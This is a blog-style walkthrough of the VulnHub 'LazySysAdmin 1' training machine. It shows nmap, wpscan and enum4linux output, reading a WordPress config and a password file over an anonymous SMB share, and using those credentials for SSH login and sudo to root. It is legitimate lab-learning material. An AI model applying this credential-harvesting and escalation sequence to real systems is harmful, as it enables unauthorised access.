LazySysAdmin One – Writeup

Details

This machine is https://www.vulnhub.com/entry/lazysysadmin-1,205/

Recon Phase

I started by using a host discovery scan to find the target on the network

root@kali:~# nmap -sn 192.168.56.0/24
Starting Nmap 7.70 ( https://nmap.org ) at 2018-07-03 16:55 BST
Nmap scan report for 192.168.56.1
Host is up (0.00058s latency).
MAC Address: 0A:00:27:00:00:16 (Unknown)
Nmap scan report for 192.168.56.100
Host is up (0.00029s latency).
MAC Address: 08:00:27:D1:A6:7A (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.101
Host is up (0.00065s latency).
MAC Address: 08:00:27:CF:3A:31 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.102
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 27.97 seconds

The target was running on 192.168.56.101, so I performed a service discovery scan on it

root@kali:~# nmap -sV 192.168.56.101
Starting Nmap 7.70 ( https://nmap.org ) at 2018-07-03 16:56 BST
Nmap scan report for 192.168.56.101
Host is up (0.0011s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http        Apache httpd 2.4.7 ((Ubuntu))
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
3306/tcp open  mysql       MySQL (unauthorized)
6667/tcp open  irc         InspIRCd
MAC Address: 08:00:27:CF:3A:31 (Oracle VirtualBox virtual NIC)
Service Info: Hosts: LAZYSYSADMIN, Admin.local; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.23 seconds

Gaining Access

I started by navigating to http://192.168.56.101/ in browser to see what was running on the webserver

Screenshot 1

After exploring this, I did not find anything interesting. So I setup dirbuster to take a look at files on the webserver

Screenshot 2

Which once completed provided multiple leads for exploitation

Screenshot 3

From here I started by going to /info.php

Screenshot 4

This gave me lots of information as to the underlying configuration of the server, but nothing that helps me get into it at the moment. So next I decided to checkout the wordpress section on /wordpress

Screenshot 5

I decided to use wpscan to see if there was anything I could exploit on the wordpress site

root@kali:~# wpscan -u 192.168.56.101/wordpress/
_______________________________________________________________
        __          _______   _____
        \ \        / /  __ \ / ____|
         \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
           \  /\  /  | |     ____) | (__| (_| | | | |
            \/  \/   |_|    |_____/ \___|\__,_|_| |_|
        WordPress Security Scanner by the WPScan Team
                       Version 2.9.3
          Sponsored by Sucuri - https://sucuri.net
   @_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
_______________________________________________________________
[+] URL: http://192.168.56.101/wordpress/
[+] Started: Tue Jul  3 19:13:31 2018
[!] The WordPress 'http://192.168.56.101/wordpress/readme.html' file exists exposing a version number
[+] Interesting header: LINK: <http://192.168.56.101/wordpress/index.php?rest_route=/>; rel="https://api.w.org/"
[+] Interesting header: SERVER: Apache/2.4.7 (Ubuntu)
[+] Interesting header: X-POWERED-BY: PHP/5.5.9-1ubuntu4.22
[!] Registration is enabled: http://192.168.56.101/wordpress/wp-login.php?action=register
[+] XML-RPC Interface available under: http://192.168.56.101/wordpress/xmlrpc.php
[!] Upload directory has directory listing enabled: http://192.168.56.101/wordpress/wp-content/uploads/
[!] Includes directory has directory listing enabled: http://192.168.56.101/wordpress/wp-includes/
[+] WordPress version 4.8.1 (Released on 2017-08-02) identified from meta generator, links opml, stylesheets numbers, advanced fingerprinting
[!] 18 vulnerabilities identified from the version number
<SNIP>
[+] Enumerating plugins from passive detection ...
[+] No plugins found
[+] Finished: Tue Jul  3 19:13:34 2018
[+] Requests Done: 45
[+] Memory used: 38.594 MB
[+] Elapsed time: 00:00:02

Although this provided me with some places to look for exploits, none of them were helpful in gaining access. So after checking out the other pages found by dirbuster, and not making any progress, I moved onto SMB.

root@kali:~# enum4linux 192.168.56.101
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Tue Jul  3 20:13:34 2018
 ==========================
|    Target Information    |
 ==========================
Target ........... 192.168.56.101
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
<SNIP>
 ===========================================
|    Share Enumeration on 192.168.56.101    |
 ===========================================
WARNING: The "syslog" option is deprecated
    Sharename       Type      Comment
    ---------       ----      -------
    print$          Disk      Printer Drivers
    share$          Disk      Sumshare
    IPC$            IPC       IPC Service (Web server)
<SNIP>
enum4linux complete on Tue Jul  3 20:14:01 2018

From this I can see there is a share$ drive on SMB, so I connected to it

Screenshot 6

When prompted I continued as an anonymous user, before being presented with some directories

Screenshot 7

I started in the share$ folder

Screenshot 8

This is interesting as it looks like the root of the webserver. There are multiple files I now want to see, starting with todolist.txt

Screenshot 9

That confirmed I was in the web root. Next I checkout deets.txt

Screenshot 10

Now I have a password of 12345 but no information as to what it is for. But there is another file I want to check of wordpress/wp-config.php

Screenshot 11

Now I have some creds for mysql

Admin:TogieMYSQL12345^^

I try to use them to connect via terminal

root@kali:~# mysql -h 192.168.56.101 -u Admin
ERROR 1130 (HY000): Host '192.168.56.102' is not allowed to connect to this MySQL server

It seemed that connections were either local only or using a whitelist, but I knew phpmyadmin was running. So I navigated to http://192.168.56.101/phpmyadmin/

Screenshot 12

And logged in with the creds I have gained

Screenshot 13

Although I was now into phpmyadmin, this turned out to be fruitless, as it was unable to access tables due to what seemed to be a config issue. So I began to look for places to use the 12345 password. Starting with the wordpress login, but this did not work. Next I tried ssh, needing a username I tried "togie" as the wordpress site repeatedly mentioned it

root@kali:~# togie@192.168.56.101
##################################################################################################
#                                          Welcome to Web_TR1                                    #
#                             All connections are monitored and recorded                         #
#                    Disconnect IMMEDIATELY if you are not an authorized user!                   #
##################################################################################################
togie@192.168.56.101's password:

I used 12345 as the password

togie@LazySysAdmin:~$

Root Time

Now I had a shell, I wanted to see what I could do

togie@LazySysAdmin:~$ sudo -l
Matching Defaults entries for togie on LazySysAdmin:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User togie may run the following commands on LazySysAdmin:
    (ALL : ALL) ALL

This means the machine can be rooted

togie@LazySysAdmin:~$ sudo su
root@LazySysAdmin:/home/togie#

All that was left to do was get the flag

root@LazySysAdmin:/home/togie# cd /root
root@LazySysAdmin:~# ls -la
drwx------  3 root root 4096 Aug 15  2017 .
drwxr-xr-x 22 root root 4096 Aug 21  2017 ..
-rw-------  1 root root 1000 Aug 21  2017 .bash_history
-rw-r--r--  1 root root 3106 Feb 20  2014 .bashrc
drwx------  2 root root 4096 Aug 14  2017 .cache
-rw-r--r--  1 root root  140 Feb 20  2014 .profile
-rw-r--r--  1 root root  347 Aug 21  2017 proof.txt
root@LazySysAdmin:~# cat proof.txt
WX6k7NJtA8gfk*w5J3&T@*Ga6!0o5UP89hMVEQ#PT9851
Well done :)
Hope you learn't a few things along the way.
Regards,
Togie Mcdogie
Enjoy some random strings
WX6k7NJtA8gfk*w5J3&T@*Ga6!0o5UP89hMVEQ#PT9851
2d2v#X6x9%D6!DDf4xC1ds6YdOEjug3otDmc1$#slTET7
pf%&1nRpaj^68ZeV2St9GkdoDkj48Fl$MI97Zt2nebt02
bhO!5Je65B6Z0bhZhQ3W64wL65wonnQ$@yw%Zhy0U19pu

And with that the machine was completed!

Leave a Reply

Your email address will not be published. Required fields are marked *